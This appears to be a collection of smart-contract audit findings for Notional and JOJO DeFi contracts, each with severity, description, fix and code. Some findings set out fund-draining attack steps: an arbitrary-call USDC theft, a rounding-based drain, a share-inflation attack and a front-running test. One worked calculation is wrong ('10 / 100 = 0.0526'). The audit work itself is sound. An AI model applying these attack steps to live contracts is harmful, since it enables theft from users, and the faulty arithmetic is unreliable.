The rebalancing of unhealthy currencies will be delayed, resulting in an excess of liquidity being lent out to the external market. This might affect the liquidity of the protocol, potentially resulting in withdrawal or liquidation having issues executed due to insufficient liquidity.
```\\nFile: TreasuryAction.sol\\n function _rebalanceCurrency(uint16 currencyId, bool useCooldownCheck) private { \\n RebalancingContextStorage memory context = LibStorage.getRebalancingContext()[currencyId]; \\n // Accrues interest up to the current block before any rebalancing is executed\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId); \\n PrimeRate memory pr = PrimeRateLib.buildPrimeRateStateful(currencyId); \\n\\n bool hasCooldownPassed = _hasCooldownPassed(context); \\n (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) = \\n _isExternalLendingUnhealthy(currencyId, oracle, pr); \\n\\n // Cooldown check is bypassed when the owner updates the rebalancing targets\\n if (useCooldownCheck) require(hasCooldownPassed || isExternalLendingUnhealthy); \\n```\\n
Rebalance might be skipped even if the external lending is unhealthy
medium
The deviation between the target and current lending amount (offTargetPercentage) will be underestimated due to incorrect calculation. As a result, a rebalancing might be skipped even if the existing external lending is unhealthy.\\nThe formula used within the `_isExternalLendingUnhealthy` function below calculating the `offTargetPercentage` can be simplified as follows for the readability of this issue.\\n$$ offTargetPercentage = \\frac{\\mid currentExternalUnderlyingLend - targetAmount \\mid}{currentExternalUnderlyingLend + targetAmount} \\times 100% $$\\nAssume that the `targetAmount` is 100 and `currentExternalUnderlyingLend` is 90. The off-target percentage will be 5.26%, which is incorrect.\\n```\\noffTargetPercentage = abs(90 - 100) / (100 + 90) = 10 / 190 = 0.0526 = 5.26%\\n```\\n\\nThe correct approach is to calculate the off-target percentages as a ratio of the difference to the target:\\n$$ offTargetPercentage = \\frac{\\mid currentExternalUnderlyingLend - targetAmount \\mid}{targetAmount} \\times 100% $$\\n```\\noffTargetPercentage = abs(90 - 100) / (100) = 10 / 100 = 0.0526 = 10%\\n```\\n\\n```\\nFile: TreasuryAction.sol\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n oracleData = oracle.getOracleData(); \\n\\n RebalancingTargetData memory rebalancingTargetData =\\n LibStorage.getRebalancingTargets()[currencyId][oracleData.holding]; \\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId); \\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId); \\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n ); \\n\\n if (oracleData.currentExternalUnderlyingLend == 0) { \\n // If this is zero then there is no outstanding lending.\\n isExternalLendingUnhealthy = false; \\n } else {\\n uint256 offTargetPercentage = oracleData.currentExternalUnderlyingLend.toInt() \\n .sub(targetAmount.toInt()).abs()\\n .toUint()\\n .mul(uint256(Constants.PERCENTAGE_DECIMALS))\\n .div(targetAmount.add(oracleData.currentExternalUnderlyingLend)); \\n \\n // prevent rebalance if change is not greater than 1%, important for health check and avoiding triggering\\n // rebalance shortly after rebalance on minimum change\\n isExternalLendingUnhealthy = \\n (targetAmount < oracleData.currentExternalUnderlyingLend) && (offTargetPercentage > 0); \\n }\\n }\\n```\\n
Consider calculating the off-target percentages as a ratio of the difference to the target:\\n$$ offTargetPercentage = \\frac{\\mid currentExternalUnderlyingLend - targetAmount \\mid}{targetAmount} \\times 100% $$
The deviation between the target and current lending amount (offTargetPercentage) will be underestimated by approximately half the majority of the time. As a result, a rebalance intended to remediate the unhealthy external lending might be skipped since the code incorrectly assumes that it has not hit the off-target percentage. External lending beyond the target will affect the liquidity of the protocol, potentially resulting in withdrawal or liquidation, having issues executed due to insufficient liquidity.
```\\noffTargetPercentage = abs(90 - 100) / (100 + 90) = 10 / 190 = 0.0526 = 5.26%\\n```\\n
All funds can be stolen from JOJODealer
high
`Funding._withdraw()` makes arbitrary call with user specified params. User can for example make ERC20 to himself and steal funds.\\nUser can specify parameters `param` and `to` when withdraws:\\n```\\n function executeWithdraw(address from, address to, bool isInternal, bytes memory param) external nonReentrant {\\n Funding.executeWithdraw(state, from, to, isInternal, param);\\n }\\n```\\n\\nIn the end of `_withdraw()` function address `to` is called with that bytes param:\\n```\\n function _withdraw(\\n Types.State storage state,\\n address spender,\\n address from,\\n address to,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n bool isInternal,\\n bytes memory param\\n )\\n private\\n {\\n // rest of code\\n\\n if (param.length != 0) {\\n require(Address.isContract(to), "target is not a contract");\\n (bool success,) = to.call(param);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n }\\n }\\n```\\n\\nAs an attack vector attacker can execute withdrawal of 1 wei to USDC contract and pass calldata to transfer arbitrary USDC amount to himself via USDC contract.
Don't make arbitrary call with user specified params
All funds can be stolen from JOJODealer
```\\n function executeWithdraw(address from, address to, bool isInternal, bytes memory param) external nonReentrant {\\n Funding.executeWithdraw(state, from, to, isInternal, param);\\n }\\n```\\n
FundingRateArbitrage contract can be drained due to rounding error
high
In the `requestWithdraw`, rounding in the wrong direction is done which can lead to contract being drained.\\nIn the `requestWithdraw` function in `FundingRateArbitrage`, we find the following lines of code:\\n```\\njusdOutside[msg.sender] -= repayJUSDAmount;\\nuint256 index = getIndex();\\nuint256 lockedEarnUSDCAmount = jusdOutside[msg.sender].decimalDiv(index);\\nrequire(\\n earnUSDCBalance[msg.sender] >= lockedEarnUSDCAmount, "lockedEarnUSDCAmount is bigger than earnUSDCBalance"\\n);\\nwithdrawEarnUSDCAmount = earnUSDCBalance[msg.sender] - lockedEarnUSDCAmount;\\n```\\n\\nBecause we round down when calculating `lockedEarnUSDCAmount`, `withdrawEarnUSDCAmount` is higher than it should be, which leads to us allowing the user to withdraw more than we should allow them to given the amount of JUSD they repaid.\\nThe execution of this is a bit more complicated, let's go through an example. We will assume there's a bunch of JUSD existing in the contract and the attacker is the first to deposit.\\nSteps:\\nThe attacker deposits `1` unit of USDC and then manually sends in another 100 * 10^6 - `1` (not through deposit, just a transfer). The share price / price per earnUSDC will now be $100. Exactly one earnUSDC is in existence at the moment.\\nNext the attacker creates a new EOA and deposits a little over $101 worth of USDC (so that after fees we can get to the $100), giving one earnUSDC to the EOA. The attacker will receive around $100 worth of `JUSD` from doing this.\\nAttacker calls `requestWithdraw` with `repayJUSDAmount` = `1` with the second newly created EOA\\n`lockedEarnUSDCAmount` is rounded down to 0 (since `repayJUSDAmount` is subtracted from jusdOutside[msg.sender]\\n`withdrawEarnUSDCAmount` will be `1`\\nAfter `permitWithdrawRequests` is called, attacker will be able to withdraw the $100 they deposited through the second EOA (granted, they lost the deposit and withdrawal fees) while only having sent `1` unit of `JUSD` back. This leads to massive profit for the attacker.\\nAttacker can repeat steps 2-6 constantly until the contract is drained of JUSD.
Round up instead of down
All JUSD in the contract can be drained
```\\njusdOutside[msg.sender] -= repayJUSDAmount;\\nuint256 index = getIndex();\\nuint256 lockedEarnUSDCAmount = jusdOutside[msg.sender].decimalDiv(index);\\nrequire(\\n earnUSDCBalance[msg.sender] >= lockedEarnUSDCAmount, "lockedEarnUSDCAmount is bigger than earnUSDCBalance"\\n);\\nwithdrawEarnUSDCAmount = earnUSDCBalance[msg.sender] - lockedEarnUSDCAmount;\\n```\\n
`JUSDBankStorage::getTRate()`,`JUSDBankStorage::accrueRate()` are calculated differently, and the data calculation is biased, Causes the `JUSDBank` contract funciton result to be incorrect
medium
```\\n function accrueRate() public {\\n uint256 currentTimestamp = block.timestamp;\\n if (currentTimestamp == lastUpdateTimestamp) {\\n return;\\n }\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n tRate = tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR + 1e18);\\n lastUpdateTimestamp = currentTimestamp;\\n }\\n\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return tRate + (borrowFeeRate * timeDifference) / Types.SECONDS_PER_YEAR;\\n }\\n```\\n\\nJUSDBankStorage::getTRate(),JUSDBankStorage::accrueRate() are calculated differently, and the data calculation is biased, resulting in the JUSDBank contract not being executed correctly\\nThe wrong result causes the funciton calculation results of `JUSDBank::_isAccountSafe()`, `JUSDBank::flashLoan()`, `JUSDBank::_handleBadDebt`, etc. to be biased,and all functions that call the relevant function will be biased
Use the same calculation formula:\\n```\\n function accrueRate() public {\\n uint256 currentTimestamp = block.timestamp;\\n if (currentTimestamp == lastUpdateTimestamp) {\\n return;\\n }\\n uint256 timeDifference = block.timestamp // Remove the line below\\n uint256(lastUpdateTimestamp);\\n tRate = tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR // Add the line below\\n 1e18);\\n lastUpdateTimestamp = currentTimestamp;\\n }\\n\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp // Remove the line below\\n uint256(lastUpdateTimestamp);\\n// Remove the line below\\n return tRate // Add the line below\\n (borrowFeeRate * timeDifference) / Types.SECONDS_PER_YEAR;\\n// Add the line below\\n return tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR // Add the line below\\n 1e18);\\n }\\n```\\n
Causes the `JUSDBank` contract funciton result to be incorrect
```\\n function accrueRate() public {\\n uint256 currentTimestamp = block.timestamp;\\n if (currentTimestamp == lastUpdateTimestamp) {\\n return;\\n }\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n tRate = tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR + 1e18);\\n lastUpdateTimestamp = currentTimestamp;\\n }\\n\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return tRate + (borrowFeeRate * timeDifference) / Types.SECONDS_PER_YEAR;\\n }\\n```\\n
Funding#requestWithdraw uses incorrect withdraw address
medium
When requesting a withdraw, `msg.sender` is used in place of the `from` address. This means that withdraws cannot be initiated on behalf of other users. This will break integrations that depend on this functionality leading to irretrievable funds.\\nFunding.sol#L69-L82\\n```\\nfunction requestWithdraw(\\n Types.State storage state,\\n address from,\\n uint256 primaryAmount,\\n uint256 secondaryAmount\\n)\\n external\\n{\\n require(isWithdrawValid(state, msg.sender, from, primaryAmount, secondaryAmount), Errors.WITHDRAW_INVALID);\\n state.pendingPrimaryWithdraw[msg.sender] = primaryAmount;\\n state.pendingSecondaryWithdraw[msg.sender] = secondaryAmount;\\n state.withdrawExecutionTimestamp[msg.sender] = block.timestamp + state.withdrawTimeLock;\\n emit RequestWithdraw(msg.sender, primaryAmount, secondaryAmount, state.withdrawExecutionTimestamp[msg.sender]);\\n}\\n```\\n\\nAs shown above the withdraw is accidentally queue to `msg.sender` NOT the `from` address. This means that all withdraws started on behalf of another user will actually trigger a withdraw `from` the `operator`. The result is that withdraw cannot be initiated on behalf of other users, even if the allowance is set properly, leading to irretrievable funds
Change all occurrences of `msg.sender` in stage changes to `from` instead.
Requesting withdraws for other users is broken and strands funds
```\\nfunction requestWithdraw(\\n Types.State storage state,\\n address from,\\n uint256 primaryAmount,\\n uint256 secondaryAmount\\n)\\n external\\n{\\n require(isWithdrawValid(state, msg.sender, from, primaryAmount, secondaryAmount), Errors.WITHDRAW_INVALID);\\n state.pendingPrimaryWithdraw[msg.sender] = primaryAmount;\\n state.pendingSecondaryWithdraw[msg.sender] = secondaryAmount;\\n state.withdrawExecutionTimestamp[msg.sender] = block.timestamp + state.withdrawTimeLock;\\n emit RequestWithdraw(msg.sender, primaryAmount, secondaryAmount, state.withdrawExecutionTimestamp[msg.sender]);\\n}\\n```\\n
FundRateArbitrage is vulnerable to inflation attacks
medium
When index is calculated, it is figured by dividing the net value of the contract (including USDC held) by the current supply of earnUSDC. Through deposit and donation this ratio can be inflated. Then when others deposit, their deposit can be taken almost completely via rounding.\\nFundingRateArbitrage.sol#L98-L104\\n```\\nfunction getIndex() public view returns (uint256) {\\n if (totalEarnUSDCBalance == 0) {\\n return 1e18;\\n } else {\\n return SignedDecimalMath.decimalDiv(getNetValue(), totalEarnUSDCBalance);\\n }\\n}\\n```\\n\\nIndex is calculated is by dividing the net value of the contract (including USDC held) by the current supply of totalEarnUSDCBalance. This can be inflated via donation. Assume the user deposits 1 share then donates 100,000e6 USDC. The exchange ratio is now 100,000e18 which causes issues during deposits.\\nFundingRateArbitrage.sol#L258-L275\\n```\\nfunction deposit(uint256 amount) external {\\n require(amount != 0, "deposit amount is zero");\\n uint256 feeAmount = amount.decimalMul(depositFeeRate);\\n if (feeAmount > 0) {\\n amount -= feeAmount;\\n IERC20(usdc).transferFrom(msg.sender, owner(), feeAmount);\\n }\\n uint256 earnUSDCAmount = amount.decimalDiv(getIndex());\\n IERC20(usdc).transferFrom(msg.sender, address(this), amount);\\n JOJODealer(jojoDealer).deposit(0, amount, msg.sender);\\n earnUSDCBalance[msg.sender] += earnUSDCAmount;\\n jusdOutside[msg.sender] += amount;\\n totalEarnUSDCBalance += earnUSDCAmount;\\n require(getNetValue() <= maxNetValue, "net value exceed limitation");\\n uint256 quota = maxUsdcQuota[msg.sender] == 0 ? defaultUsdcQuota : maxUsdcQuota[msg.sender];\\n require(earnUSDCBalance[msg.sender].decimalMul(getIndex()) <= quota, "usdc amount bigger than quota");\\n emit DepositToHedging(msg.sender, amount, feeAmount, earnUSDCAmount);\\n}\\n```\\n\\nNotice earnUSDCAmount is amount / index. With the inflated index that would mean that any deposit under 100,000e6 will get zero shares, making it exactly like the standard ERC4626 inflation attack.
Use a virtual offset as suggested by OZ for their ERC4626 contracts
Subsequent user deposits can be stolen
```\\nfunction getIndex() public view returns (uint256) {\\n if (totalEarnUSDCBalance == 0) {\\n return 1e18;\\n } else {\\n return SignedDecimalMath.decimalDiv(getNetValue(), totalEarnUSDCBalance);\\n }\\n}\\n```\\n
Lender transactions can be front-run, leading to lost funds
high
Users can mint wfCash tokens via `mintViaUnderlying` by passing a variable `minImpliedRate` to guard against trade slippage. If the market interest is lower than expected by the user, the transaction will revert due to slippage protection. However, if the user mints a share larger than maxFCash, the `minImpliedRate` check is not performed.\\n```\\n function mintViaUnderlying(\\n uint256 depositAmountExternal,\\n uint88 fCashAmount,\\n address receiver,\\n uint32 minImpliedRate//@audit when lendAmount bigger than maxFCash lack of minRate protect.\\n ) external override {\\n (/* */, uint256 maxFCash) = getTotalFCashAvailable();\\n _mintInternal(depositAmountExternal, fCashAmount, receiver, minImpliedRate, maxFCash);\\n }\\n```\\n\\n```\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);//@audit-info fCashAmount * (underlyingTokenDecimals) / 1e8\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);//@audit check this.\\n } \\n```\\n\\nImagine the following scenario:\\nlender deposit Underlying token to `mint` some shares and set a `minImpliedRate` to protect the trsanction\\nalice front-run her transaction invoke `mint` to `mint` some share\\nthe shares of lender `mint` now is bigger than `maxFCash`\\nnow the lender `lending at zero`\\n```\\n function testDepositViaUnderlying() public {\\n address alice = makeAddr("alice");\\n deal(address(asset), LENDER, 8800 * precision, true);\\n deal(address(asset), alice, 5000 * precision, true);\\n\\n //alice deal.\\n vm.stopPrank();\\n vm.startPrank(alice);\\n asset.approve(address(w), type(uint256).max);\\n \\n //==============================LENDER START=============================//\\n vm.stopPrank();\\n vm.startPrank(LENDER);\\n asset.approve(address(w), type(uint256).max);\\n //user DAI balance before:\\n assertEq(asset.balanceOf(LENDER), 8800e18);\\n\\n (/* */, uint256 maxFCash) = w.getTotalFCashAvailable();\\n console2.log("current maxFCash:",maxFCash);\\n\\n //LENDER mintViaUnderlying will revert due to slippage.\\n uint32 minImpliedRate = 0.15e9;\\n vm.expectRevert("Trade failed, slippage");\\n w.mintViaUnderlying(5000e18,5000e8,LENDER,minImpliedRate);\\n //==============================LENDER END=============================//\\n\\n //======================alice frontrun to mint some shares.============//\\n vm.stopPrank();\\n vm.startPrank(alice);\\n w.mint(5000e8,alice);\\n\\n //==========================LENDER TX =================================//\\n vm.stopPrank();\\n vm.startPrank(LENDER);\\n asset.approve(address(w), type(uint256).max);\\n //user DAI balance before:\\n assertEq(asset.balanceOf(LENDER), 8800e18);\\n\\n //LENDER mintViaUnderlying will success.\\n w.mintViaUnderlying(5000e18,5000e8,LENDER,minImpliedRate);\\n\\n console2.log("lender mint token:",w.balanceOf(LENDER));\\n console2.log("lender cost DAI:",8800e18 - asset.balanceOf(LENDER));\\n }\\n```\\n\\nFrom the above test, we can observe that if `maxFCasha` is greater than `5000e8`, the lender's transaction will be reverted due to "Trade failed, slippage." Subsequently, if Alice front-runs by invoking `mint` to create some shares before the lender, the lender's transaction will succeed. Therefore, the lender's `minImpliedRate` check will be bypassed, leading to a loss of funds for the lender.
add a check inside `_mintInternal`\\n```\\n if (maxFCash < fCashAmount) {\\n// Add the line below\\n require(minImpliedRate ==0,"Trade failed, slippage"); \\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);//@audit-info fCashAmount * (underlyingTokenDecimals) / 1e8\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);//@audit check this.\\n }\\n```\\n
lender lost of funds
```\\n function mintViaUnderlying(\\n uint256 depositAmountExternal,\\n uint88 fCashAmount,\\n address receiver,\\n uint32 minImpliedRate//@audit when lendAmount bigger than maxFCash lack of minRate protect.\\n ) external override {\\n (/* */, uint256 maxFCash) = getTotalFCashAvailable();\\n _mintInternal(depositAmountExternal, fCashAmount, receiver, minImpliedRate, maxFCash);\\n }\\n```\\n
Residual ETH will not be sent back to users during the minting of wfCash
high
Residual ETH will not be sent back to users, resulting in a loss of assets.\\nAt Line 67, residual ETH within the `depositUnderlyingToken` function will be sent as Native ETH back to the `msg.sender`, which is this wfCash Wrapper contract.\\n```\\nFile: wfCashLogic.sol\\n function _mintInternal(\\n..SNIP..\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION); \\n require(fCashAmountExternal <= depositAmountExternal); \\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n..SNIP..\\n // Residual tokens will be sent back to msg.sender, not the receiver. The msg.sender\\n // was used to transfer tokens in and these are any residual tokens left that were not\\n // lent out. Sending these tokens back to the receiver risks them getting locked on a\\n // contract that does not have the capability to transfer them off\\n _sendTokensToReceiver(token, msg.sender, isETH, balanceBefore);\\n```\\n\\nWithin the `depositUnderlyingToken` function Line 108 below, the `returnExcessWrapped` parameter is set to `false`, which means it will not wrap the residual ETH, and that Native ETH will be sent back to the caller (wrapper contract)\\n```\\nFile: AccountAction.sol\\n function depositUnderlyingToken(\\n address account,\\n uint16 currencyId,\\n uint256 amountExternalPrecision\\n ) external payable nonReentrant returns (uint256) {\\n..SNIP..\\nFile: AccountAction.sol\\n int256 primeCashReceived = balanceState.depositUnderlyingToken(\\n msg.sender,\\n SafeInt256.toInt(amountExternalPrecision),\\n false // there should never be excess ETH here by definition\\n );\\n```\\n\\nbalanceBefore = amount of WETH before the deposit, balanceAfter = amount of WETH after the deposit.\\nWhen the `_sendTokensToReceiver` is executed, these two values are going to be the same since it is Native ETH that is sent to the wrapper instead of WETH. As a result, the Native ETH that the wrapper received is not forwarded to the users.\\n```\\nFile: wfCashLogic.sol\\n function _sendTokensToReceiver( \\n IERC20 token,\\n address receiver,\\n bool isETH,\\n uint256 balanceBefore\\n ) private returns (uint256 tokensTransferred) {\\n uint256 balanceAfter = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n tokensTransferred = balanceAfter - balanceBefore; \\n\\n if (isETH) {\\n // No need to use safeTransfer for WETH since it is known to be compatible\\n IERC20(address(WETH)).transfer(receiver, tokensTransferred); \\n } else if (tokensTransferred > 0) { \\n token.safeTransfer(receiver, tokensTransferred); \\n }\\n }\\n```\\n
If the underlying is ETH, measure the Native ETH balance before and after the `depositUnderlyingToken` is executed. Forward any residual Native ETH to the users, if any.
Loss of assets as the residual ETH is not sent to the users.
```\\nFile: wfCashLogic.sol\\n function _mintInternal(\\n..SNIP..\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION); \\n require(fCashAmountExternal <= depositAmountExternal); \\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n..SNIP..\\n // Residual tokens will be sent back to msg.sender, not the receiver. The msg.sender\\n // was used to transfer tokens in and these are any residual tokens left that were not\\n // lent out. Sending these tokens back to the receiver risks them getting locked on a\\n // contract that does not have the capability to transfer them off\\n _sendTokensToReceiver(token, msg.sender, isETH, balanceBefore);\\n```\\n
Residual ETH not sent back when `batchBalanceAndTradeAction` executed
high
Residual ETH was not sent back when `batchBalanceAndTradeAction` function was executed, resulting in a loss of assets.\\nPer the comment at Line 122 below, when there is residual ETH, native ETH will be sent from Notional V3 to the wrapper contract. In addition, per the comment at Line 109, it is often the case to have an excess amount to be refunded to the users.\\n```\\nFile: wfCashLogic.sol\\n function _lendLegacy(\\nFile: wfCashLogic.sol\\n // If deposit amount external is in excess of the cost to purchase fCash amount (often the case),\\n // then we need to return the difference between postTradeCash - preTradeCash. This is done because\\n // the encoded trade does not automatically withdraw the entire cash balance in case the wrapper\\n // is holding a cash balance.\\n uint256 preTradeCash = getCashBalance();\\n\\n BalanceActionWithTrades[] memory action = EncodeDecode.encodeLegacyLendTrade(\\n currencyId,\\n getMarketIndex(),\\n depositAmountExternal,\\n fCashAmount,\\n minImpliedRate\\n );\\n // Notional will return any residual ETH as the native token. When we _sendTokensToReceiver those\\n // native ETH tokens will be wrapped back to WETH.\\n NotionalV2.batchBalanceAndTradeAction{value: msgValue}(address(this), action); \\n\\n uint256 postTradeCash = getCashBalance(); \\n\\n if (preTradeCash != postTradeCash) { \\n // If ETH, then redeem to WETH (redeemToUnderlying == false)\\n NotionalV2.withdraw(currencyId, _safeUint88(postTradeCash - preTradeCash), !isETH);\\n }\\n }\\n```\\n\\nThis is due to how the `depositUnderlyingExternal` function within Notional V3 is implemented. The `batchBalanceAndTradeAction` will trigger the `depositUnderlyingExternal` function. Within the `depositUnderlyingExternal` function at Line 196, excess ETH will be transferred back to the account (wrapper address) in Native ETH term.\\nNote that for other ERC20 tokens, such as DAI or USDC, the excess will be added to the wrapper's cash balance, and this issue will not occur.\\n```\\nFile: TokenHandler.sol\\n function depositUnderlyingExternal(\\n address account,\\n uint16 currencyId,\\n int256 _underlyingExternalDeposit,\\n PrimeRate memory primeRate,\\n bool returnNativeTokenWrapped\\n ) internal returns (int256 actualTransferExternal, int256 netPrimeSupplyChange) {\\n uint256 underlyingExternalDeposit = _underlyingExternalDeposit.toUint();\\n if (underlyingExternalDeposit == 0) return (0, 0);\\n\\n Token memory underlying = getUnderlyingToken(currencyId);\\n if (underlying.tokenType == TokenType.Ether) {\\n // Underflow checked above\\n if (underlyingExternalDeposit < msg.value) {\\n // Transfer any excess ETH back to the account\\n GenericToken.transferNativeTokenOut(\\n account, msg.value - underlyingExternalDeposit, returnNativeTokenWrapped\\n );\\n } else {\\n require(underlyingExternalDeposit == msg.value, "ETH Balance");\\n }\\n\\n actualTransferExternal = _underlyingExternalDeposit;\\n```\\n\\nIn the comment, it mentioned that any residual ETH in native token will be wrapped back to WETH by the `_sendTokensToReceiver`.\\n```\\nFile: wfCashLogic.sol\\n function _lendLegacy(\\n..SNIP..\\n // Notional will return any residual ETH as the native token. When we _sendTokensToReceiver those\\n // native ETH tokens will be wrapped back to WETH.\\n```\\n\\nHowever, the current implementation of the `_sendTokensToReceiver`, as shown below, does not wrap the Native ETH to WETH. Thus, the residual ETH will not be sent back to the users and stuck in the contract.\\n```\\nFile: wfCashLogic.sol\\n function _sendTokensToReceiver( \\n IERC20 token,\\n address receiver,\\n bool isETH,\\n uint256 balanceBefore\\n ) private returns (uint256 tokensTransferred) {\\n uint256 balanceAfter = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n tokensTransferred = balanceAfter - balanceBefore; \\n\\n if (isETH) {\\n // No need to use safeTransfer for WETH since it is known to be compatible\\n IERC20(address(WETH)).transfer(receiver, tokensTransferred); \\n } else if (tokensTransferred > 0) { \\n token.safeTransfer(receiver, tokensTransferred); \\n }\\n }\\n```\\n
If the underlying is ETH, measure the Native ETH balance before and after the `batchBalanceAndTradeAction` is executed. Forward any residual Native ETH to the users, if any.
Loss of assets as the residual ETH is not sent to the users.
```\\nFile: wfCashLogic.sol\\n function _lendLegacy(\\nFile: wfCashLogic.sol\\n // If deposit amount external is in excess of the cost to purchase fCash amount (often the case),\\n // then we need to return the difference between postTradeCash - preTradeCash. This is done because\\n // the encoded trade does not automatically withdraw the entire cash balance in case the wrapper\\n // is holding a cash balance.\\n uint256 preTradeCash = getCashBalance();\\n\\n BalanceActionWithTrades[] memory action = EncodeDecode.encodeLegacyLendTrade(\\n currencyId,\\n getMarketIndex(),\\n depositAmountExternal,\\n fCashAmount,\\n minImpliedRate\\n );\\n // Notional will return any residual ETH as the native token. When we _sendTokensToReceiver those\\n // native ETH tokens will be wrapped back to WETH.\\n NotionalV2.batchBalanceAndTradeAction{value: msgValue}(address(this), action); \\n\\n uint256 postTradeCash = getCashBalance(); \\n\\n if (preTradeCash != postTradeCash) { \\n // If ETH, then redeem to WETH (redeemToUnderlying == false)\\n NotionalV2.withdraw(currencyId, _safeUint88(postTradeCash - preTradeCash), !isETH);\\n }\\n }\\n```\\n
_isExternalLendingUnhealthy() using stale factors
medium
In `checkRebalance()` -> _isExternalLendingUnhealthy() -> getTargetExternalLendingAmount(factors) using stale `factors` will lead to inaccurate `targetAmount`, which in turn will cause `checkRebalance()` that should have been rebalance to not execute.\\nrebalancingBot uses `checkRebalance()` to return the `currencyIds []` that need to be `rebalance`.\\ncall order : `checkRebalance()` -> `_isExternalLendingUnhealthy()` -> `ExternalLending.getTargetExternalLendingAmount(factors)`\\n```\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n// rest of code\\n\\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n );\\n```\\n\\nA very important logic is to get `targetAmount`. The calculation of this value depends on `factors`. But currently used is PrimeCashFactors memory `factors` = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);. This is not the latest. It has not been aggregated yet. The correct one should be `( /* */,factors) = PrimeCashExchangeRate.getPrimeCashRateView();`.
```\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n// rest of code\\n\\n// Remove the line below\\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);\\n// Add the line below\\n ( /* */,PrimeCashFactors memory factors) = PrimeCashExchangeRate.getPrimeCashRateView();\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n );\\n```\\n
Due to the incorrect `targetAmount`, it may cause the `currencyId` that should have been re-executed `Rebalance` to not execute `rebalance`, increasing the risk of the protocol.
```\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n// rest of code\\n\\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n );\\n```\\n
recover() using the standard transfer may not be able to retrieve some tokens
medium
